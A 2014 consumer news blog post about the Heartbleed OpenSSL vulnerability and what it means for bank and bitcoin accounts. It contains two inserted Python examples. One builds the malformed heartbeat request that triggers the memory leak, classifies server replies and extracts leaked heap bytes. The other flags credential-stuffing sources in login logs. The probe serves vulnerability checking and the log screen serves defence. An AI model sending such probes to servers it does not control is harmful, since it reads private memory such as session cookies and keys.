
Could Web bug invade your accounts?

By Allison Ross ·
Wednesday, April 9, 2014
Posted: 2 pm ET

The Web has been abuzz this week after researchers announced they had discovered a flaw in an important piece of security software used by many websites.

The vulnerability, nicknamed Heartbleed (tracked as CVE-2014-0160), is in OpenSSL, a widely used library that implements the SSL/TLS encryption protocols. The bug has been present since OpenSSL 1.0.1 was released in 2012: versions 1.0.1 through 1.0.1f are affected, and 1.0.1g contains the fix. Some experts say there is evidence that attackers knew about the vulnerability for at least a little while before it was announced.

OpenSSL lets websites encrypt communications with their visitors. Ars Technica has reported that roughly two-thirds of web servers use it.

Attacks using this vulnerability leave no trace in ordinary server logs: the malicious request is handled inside the encryption library and never reaches the web application, so unless a site was recording its full network traffic it has no way to tell whether it was exploited. At least one prominent security blogger is calling the vulnerability "catastrophic."

Websites are being advised to immediately upgrade to a fixed version of the OpenSSL library (1.0.1g, or a build with the heartbeat extension disabled), generate new private keys and reissue their certificates (the old keys may have been read out of server memory), change corporate passwords, and log out users and advise them to change their own passwords, according to The New York Times. (Note: Consumers should change a password only after the site they use has confirmed it has issued a fix; a new password typed into a still-vulnerable site can be leaked just like the old one.)

A list hosted on GitHub shows which sites were seen as vulnerable or not vulnerable to the Heartbleed bug as of yesterday. Many sites, including Yahoo, Facebook and Google, have since said they have either fixed the problem or are working on doing so, the Times reported.
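Lists like that one were compiled by probing each site. The following is an added example, written for this post and not taken from the post, from the list's author or from OpenSSL, of what such a probe sends and how the reply is read. A live checker first completes a TLS handshake with the target and then sends the record built here; that network part is left out, and the server replies are constructed inline so the classification can be seen for both the vulnerable and the patched case. Only probe servers you are responsible for.

```python
"""Heartbleed (CVE-2014-0160) probe record and reply classification.

Added example, not code from the Bankrate post or from OpenSSL. The live
network part (TLS handshake, then sending the probe) is left out; server
replies below are constructed, not captured from any real host.
"""
import struct

HEARTBEAT = 24            # TLS record content type for heartbeat (RFC 6520)
ALERT = 21
HB_REQUEST, HB_RESPONSE = 1, 2
TLS_1_1 = (3, 2)
MAX_FRAGMENT = 16384      # OpenSSL splits larger writes into several records
PADDING = 16              # minimum heartbeat padding the RFC requires


def tls_records(ctype, body, version=TLS_1_1):
    """Wrap `body` in one or more TLS records of at most MAX_FRAGMENT bytes."""
    out = b""
    for i in range(0, len(body), MAX_FRAGMENT):
        frag = body[i:i + MAX_FRAGMENT]
        out += struct.pack("!BBBH", ctype, version[0], version[1], len(frag)) + frag
    return out


def build_heartbeat_probe(claimed_len=0x4000):
    """Heartbeat request whose header claims `claimed_len` payload bytes but
    carries none. Unpatched OpenSSL 1.0.1 to 1.0.1f trusts the claimed length
    and copies that many bytes of its own heap into the reply."""
    return tls_records(HEARTBEAT, struct.pack("!BH", HB_REQUEST, claimed_len))


def parse_tls_records(buf):
    """Split raw bytes into (content_type, version, payload) tuples; a
    truncated trailing record is dropped rather than mis-parsed."""
    records, off = [], 0
    while off + 5 <= len(buf):
        ctype, vmaj, vmin, length = struct.unpack_from("!BBBH", buf, off)
        if off + 5 + length > len(buf):
            break
        records.append((ctype, (vmaj, vmin), buf[off + 5:off + 5 + length]))
        off += 5 + length
    return records


def classify_reply(reply, sent_payload_len=0):
    """Decide from the server's raw reply bytes whether it is vulnerable."""
    records = parse_tls_records(reply)
    for ctype, _version, payload in records:
        if ctype == HEARTBEAT and payload and payload[0] == HB_RESPONSE:
            # A correct echo is: 3-byte header + what we sent + padding.
            # Anything longer was read out of the server's memory.
            if len(payload) - 3 > sent_payload_len + PADDING:
                return "vulnerable"
            return "not vulnerable"
        if ctype == ALERT:
            return "not vulnerable"   # server rejected the malformed request
    if not reply:
        # Fixed OpenSSL (1.0.1g) silently discards a heartbeat whose claimed
        # length exceeds the record, so a timeout with no bytes is the patched
        # signature; so is a server without the heartbeat extension at all.
        return "not vulnerable"
    return "unknown"                  # truncated read or unrelated records


def leaked_bytes(reply):
    """Reassemble the echoed payload across record fragments, minus the
    3-byte heartbeat header; on a vulnerable server this is heap contents."""
    chunks = [p for ctype, _v, p in parse_tls_records(reply) if ctype == HEARTBEAT]
    if not chunks or chunks[0][:1] != bytes([HB_RESPONSE]):
        return b""
    return b"".join(chunks)[3:]


# --- constructed replies (assumptions, not captured from any real server) ---

def sample_vulnerable_reply():
    """A vulnerable server echoes 0x4000 bytes it never received; a stand-in
    heap region holding a session cookie plays the leaked memory here."""
    heap = (b"\x00" * 32 + b"Cookie: session=deadbeef; user=alice\r\n").ljust(0x4000, b"A")
    body = struct.pack("!BH", HB_RESPONSE, 0x4000) + heap + b"\x00" * PADDING
    return tls_records(HEARTBEAT, body)


def sample_honest_echo(payload=b"ping"):
    """A well-formed heartbeat answered correctly: payload plus padding only."""
    body = struct.pack("!BH", HB_RESPONSE, len(payload)) + payload + b"\x00" * PADDING
    return tls_records(HEARTBEAT, body)


def sample_alert_reply():
    """A fatal unexpected_message alert (level 2, description 10)."""
    return tls_records(ALERT, bytes([2, 10]))


if __name__ == "__main__":
    print("probe bytes :", build_heartbeat_probe().hex())
    print("vulnerable  :", classify_reply(sample_vulnerable_reply()))
    print("honest echo :", classify_reply(sample_honest_echo(), sent_payload_len=4))
    print("alert       :", classify_reply(sample_alert_reply()))
    print("silence     :", classify_reply(b""))
    print("leak sample :", leaked_bytes(sample_vulnerable_reply())[32:70])
```

The decisive signal is the length of what comes back, not its content: the probe sends no payload, so any heartbeat response longer than the header plus padding is memory the server should never have copied. Silence is the expected answer from a patched server, which is why checkers must set a socket timeout and not treat a hang as an error.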

Online banking

The GitHub site, which looks at the top 1,000 sites as indexed by Web-ranking firm Alexa, lists bank sites such as Bank of America, Wells Fargo and JPMorgan Chase as not being vulnerable.

However, experts say consumers should still be cautious when it comes to online banking.

Paul Jauregui, vice president of the security firm Praetorian, says he suspects many large and small banks are affected.

"This vulnerability is incredibly widespread," Jauregui says. He says he expects the larger banks will be able to respond more quickly to this issue than regional or community banks and credit unions.

He says he is telling people to change their passwords quickly after an online service has resolved the problem -- and to consider using dual-factor or multifactor authentication on accounts. He also suggests limiting in the next week how often you log on to online or mobile banking, and how much online shopping you do, to allow banks the time to properly fix the issue.

"Heartbleed is a huge story," says Shirley Inscoe, a senior analyst at Aite Group. "Consumers have been trained to look for the padlock which means a website is secure. ... Well, maybe (it's) not."

She says that consumers need to be cautious for now about where they put in credit card information.

"It may be best to stay off the Internet until websites are tested and the necessary corrective actions are taken," she says.

Inscoe says that since most consumers use the same login credentials on multiple sites, hackers may be able to use the credentials they find on a different site to get into your online bank account.

"Once their credentials are compromised, fraudsters can use automated bots to try the credentials on various financial institution sites until they find one that works," Inscoe says. "As a result, the consumer may be a victim of account takeover fraud."
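The pattern Inscoe describes is visible on the bank's side. The following is an added example, not code from the post or from any bank, of how a login log could be screened for it: a bot replaying credentials stolen elsewhere tries many different accounts from one source and mostly fails, whereas a real customer retries a few times against a single account. The log format, the thresholds and the sample lines are all assumptions constructed for the example.

```python
"""Spotting credential-stuffing bots in web-login logs.

Added example, not code from the Bankrate post or from any bank. The log
format (timestamp, client IP, username, OK/FAIL) and the thresholds are
assumptions, and the sample lines are constructed.
"""
from collections import defaultdict

# Constructed sample log: one bot source cycling through stolen credentials
# (one of which happens to work), and one ordinary customer mistyping twice.
SAMPLE_LOG = """\
2014-04-09T14:00:01Z 203.0.113.7 alice FAIL
2014-04-09T14:00:01Z 203.0.113.7 bob OK
2014-04-09T14:00:02Z 203.0.113.7 carol FAIL
2014-04-09T14:00:02Z 203.0.113.7 dave FAIL
2014-04-09T14:00:03Z 203.0.113.7 erin FAIL
2014-04-09T14:00:03Z 203.0.113.7 frank FAIL
2014-04-09T14:00:04Z 203.0.113.7 grace FAIL
2014-04-09T14:00:05Z 203.0.113.7 heidi FAIL
2014-04-09T14:00:10Z 198.51.100.4 ivan FAIL
2014-04-09T14:00:25Z 198.51.100.4 ivan FAIL
2014-04-09T14:00:40Z 198.51.100.4 ivan OK
"""


def parse_line(line):
    """Return (timestamp, ip, username, success) for one log line."""
    ts, ip, user, result = line.split()
    return ts, ip, user, result == "OK"


def per_source_stats(lines):
    """Group attempts by client IP: distinct usernames tried, attempt and
    success counts, and the set of accounts actually entered from that IP."""
    stats = defaultdict(lambda: {"users": set(), "attempts": 0, "ok": 0, "entered": set()})
    for line in lines:
        if not line.strip():
            continue
        _ts, ip, user, ok = parse_line(line)
        rec = stats[ip]
        rec["users"].add(user)
        rec["attempts"] += 1
        if ok:
            rec["ok"] += 1
            rec["entered"].add(user)
    return stats


def find_stuffing_sources(lines, min_users=5, max_success_rate=0.25):
    """IPs that tried at least `min_users` different accounts and succeeded
    on at most `max_success_rate` of their attempts. A production detector
    would evaluate this over a sliding time window rather than a whole file,
    and would also look at shared proxies and per-account velocity."""
    flagged = []
    for ip, rec in per_source_stats(lines).items():
        success_rate = rec["ok"] / rec["attempts"]
        if len(rec["users"]) >= min_users and success_rate <= max_success_rate:
            flagged.append(ip)
    return sorted(flagged)


def takeover_candidates(lines, **thresholds):
    """Accounts a flagged source got into: the reused passwords that worked,
    and therefore the accounts to lock and force through a password reset."""
    stats = per_source_stats(lines)
    hit = set()
    for ip in find_stuffing_sources(lines, **thresholds):
        hit |= stats[ip]["entered"]
    return sorted(hit)


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("stuffing sources :", find_stuffing_sources(lines))
    print("accounts to reset:", takeover_candidates(lines))
```

The ordinary customer in the sample (three tries, one account) is never flagged even though two of the three attempts fail; the bot is flagged because of how many distinct accounts it touches, and the one account it got into is the one that needs a forced reset and a second factor.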

Meanwhile, a few bitcoin sites have tweeted that they are temporarily halting certain services or taking precautions until the Heartbleed bug is fixed.

For instance, exchange Bitfinex tweeted Tuesday morning that "withdrawals will be disabled for 10 hours. Please change your Bitfinex credentials as soon as possible." It later tweeted that it had confirmed the system was patched and safe, and that withdrawals had resumed.

Similarly, Bitstamp turned off its login, withdrawal and other functions as a precaution, it said in a tweet. Then, early Wednesday, it tweeted that "We are happy to announce that the OpenSSL issues have been resolved. All previously disabled functions are once again available."

Here's the bottom line, dear readers: Pay attention if a website tells you it's working on a fix. Change your passwords. And, as always, pay attention to your accounts ... whether they are with a traditional bank or in a bitcoin wallet.

Follow me on Twitter (which, by the way, appears to be safe from the Heartbleed bug): @allisonsross.
